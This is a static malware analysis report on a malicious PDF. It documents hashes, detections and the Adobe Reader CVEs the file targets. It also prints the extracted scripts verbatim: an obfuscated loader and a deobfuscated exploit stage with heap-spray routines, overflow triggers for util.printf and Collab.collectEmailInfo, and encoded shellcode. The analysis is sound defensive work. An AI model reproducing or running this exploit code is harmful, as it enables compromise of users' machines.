Malicious PDF — malware analysis report

Static analysis result for SHA-256 871f0d1a85ec1dc0…

MALICIOUS

PDF

15.7 KB
MD5: ae4671dd126b638d0ce8545442c23886 SHA-1: 6e0e0e4b096d9c29c9b20c76080f6e369f53fcee SHA-256: 871f0d1a85ec1dc09f0b7e2a219d6fc45f67ad4691d22962132456a45113308f
676 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The sample is a PDF file that contains embedded JavaScript designed to exploit multiple Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is heavily obfuscated and uses a substitution-hex decoder to retrieve the exploit payload. This exploit cluster is designed to download and execute a second-stage payload, as indicated by the ClamAV detection of 'Js.Exploit.Shellcode-18' on an extracted artifact.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
aec0b1c694c5fce55c92314d8216b104a9b376b437e74d834faa6051867d99e3		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 425033 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function Ba(Xa){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
355266294bb87d477803b09a09e011a2a3bade3dfff24a50d2288db8dac4596e		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uD0FF%uE823%uB405%uD882%uD005%u6323%uDC45%u98A8%u7D19%u98A8%u510D%uE8E7%u2FF2%u63DC%u6BE9%uE86B%uD005%uE849%u5E6D%uE66D%uB8E9%u16BB%uDE8F%u074B%u30CB%u8043%u1A36%uB3A9%uE86D%u4401%uB8E2%uA1C9%u388F%u334B%uF38F%u80CA%u9C5E%u3539%u3C6D%uEBB4%u3809%uE93C%uD005%uECAA%u532E%uECC8%u100E%u1956%uBE6D%u9C46%uB805%u8154%uB96B%u1777%uF850%uB17A%u100E%u6C2C%uD0FD%uE823%u208E%uB098%uD005%u8223%uB805%uAC0A%u87ED%uA14B%uDFE8%u805D%u9B8E%uB7C0%u30ED%uE823%u5905%uC327%u3B86%uE327%uA5C5%u65D2%uD080%uE821%u8005%u174B%uD005%u1723%uE450%u6DAE%uD405%uE823%uBA55%u8223%u5D05%uE8A6%uD007%uB823%u85FA%u651B%uD0B0%uE827%u7C05%u2829%u2B70%u2F6D%uFE03%u9046%u1760%uEC65%uD005%uE823%u5588%uEC23%uD005%u2110%u8054%uBDDC%u9039%u6C2C%uD085%uE823%u594D%uA466%uD06D%uE863%uBA05%u1763%u9850%u2828%uBE71%uADAA%uBA65%u8223%uBA05%u8223%uBA05%u1723%u8050%u2828%u8A71%uE849%uD06D%uE823%uBA01%u8223%u3905%uE889%uD005%u1773%u8450%u2828%u9271%uADAA%u5D6D%u8C66%uB855%uA823%uD005%u9DDC%u2F65%u8056%u85FA%uE37B%uA4C5%u6336%uB440%u2828%uDE71%u9DDC%u2F61%u8856%uA5FA%u176F%u9050%u3DC8%uA5FA%u176F%u9450%u2108%u8144%u6DAE%uD405%uE823%u2F55%uC476%u2F6F%uBDDC%u8535%u04A8%uAD8E%uE32B%uA4FA%uBB68%u0E8E%u6375%uEC76%u9CA8%uA836%u1B20%u5B53%uC855%u2306%u2110%u914C%uEB8E%u86C6%u1E10%u6E0A%uD033%uA4D3%u292B%uDDCB%u1A20%u3B45%uD3D2%u8EFB%u0D56%u5B5F%u63C8%uF45F%u3520%u5B63%uA32F%u8A8E%uEB3F%u5BD8%u6327%u1506%uB37D%uD2EE%u2810%u1258%uE827%u81ED%u17DC%uB8FA%u9C57%uEA75%uC70C%uA364%u894A%uA06B%u9A4C%uA46B%u8151%uFE75%u8740%uFF68%u9A57%uB464%uC746%uB33A%uD91E%uA323%u8C4A%uE238%uDE12%uE236%u8942%uB161%u8B14%uE935%u8941%uB466%uD047%uB332%uD816%uE067%uDA41%uB160%u891A%uF631%uD550%uD036%uE823%u0005");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uD0FF%uE823%uB405%uD882%uD005%u6323%uDC45%u98A8%u7D19%u98A8%u510D%uE8E7%u2FF2%u63DC%u6BE9%uE86B%uD005%uE849%u5E6D%uE66D%uB8E9%u16BB%uDE8F%u074B%u30CB%u8043%u1A36%uB3A9%uE86D%u4401%uB8E2%uA1C9%u388F%u334B%uF38F%u80CA%u9C5E%u3539%u3C6D%uEBB4%u3809%uE93C%uD005%uECAA%u532E%uECC8%u100E%u1956%uBE6D%u9C46%uB805%u8154%uB96B%u1777%uF850%uB17A%u100E%u6C2C%uD0FD%uE823%u208E%uB098%uD005%u8223%uB805%uAC0A%u87ED%uA14B%uDFE8%u805D%u9B8E%uB7C0%u30ED%uE823%u5905%uC327%u3B86%uE327%uA5C5%u65D2%uD080%uE821%u8005%u174B%uD005%u1723%uE450%u6DAE%uD405%uE823%uBA55%u8223%u5D05%uE8A6%uD007%uB823%u85FA%u651B%uD0B0%uE827%u7C05%u2829%u2B70%u2F6D%uFE03%u9046%u1760%uEC65%uD005%uE823%u5588%uEC23%uD005%u2110%u8054%uBDDC%u9039%u6C2C%uD085%uE823%u594D%uA466%uD06D%uE863%uBA05%u1763%u9850%u2828%uBE71%uADAA%uBA65%u8223%uBA05%u8223%uBA05%u1723%u8050%u2828%u8A71%uE849%uD06D%uE823%uBA01%u8223%u3905%uE889%uD005%u1773%u8450%u2828%u9271%uADAA%u5D6D%u8C66%uB855%uA823%uD005%u9DDC%u2F65%u8056%u85FA%uE37B%uA4C5%u6336%uB440%u2828%uDE71%u9DDC%u2F61%u8856%uA5FA%u176F%u9050%u3DC8%uA5FA%u176F%u9450%u2108%u8144%u6DAE%uD405%uE823%u2F55%uC476%u2F6F%uBDDC%u8535%u04A8%uAD8E%uE32B%uA4FA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.